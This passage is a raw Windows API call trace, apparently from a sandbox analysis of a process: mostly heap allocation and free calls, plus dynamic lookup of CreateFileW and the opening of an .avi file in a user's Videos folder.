(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0098.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0098.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0098.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0098.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0098.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0098.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0098.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0098.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0098.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0098.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0098.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0098.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0098.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0098.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0098.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0098.224] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0098.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0098.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0098.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0098.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0098.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0098.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0098.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0098.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0098.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0098.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0098.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0098.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0098.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0098.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0098.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0098.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0098.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0098.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0098.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0098.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0098.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0098.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0098.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0098.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0098.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0098.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0098.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0098.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0098.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0098.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0098.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0098.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0098.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0098.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0098.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0098.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0098.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0098.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0098.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0098.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0098.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0098.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0098.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0098.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0098.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0098.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0098.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0098.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0098.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0098.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0098.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0098.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0098.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0098.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0098.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0098.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0098.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.228] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0098.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0098.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0098.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0098.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca5c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0098.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0098.229] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0098.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0098.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0098.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0098.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0098.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0098.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0098.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0098.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0098.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0098.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0098.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0098.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0098.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0098.229] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9zsS8CRW.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\9zss8crw.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0098.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0098.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0098.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0098.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0098.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0098.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0098.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0098.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0098.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0098.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0098.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0098.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e568 [0098.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0098.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0098.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0098.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0098.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0098.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0098.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0098.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0098.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0098.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0098.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0098.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0098.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0098.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0098.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0098.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0098.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0098.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0098.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0098.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0098.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0098.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0098.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0098.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0098.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0098.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0098.232] FreeLibrary (hLibModule=0x772d0000) returned 1 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0098.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0098.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.234] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.234] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.234] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 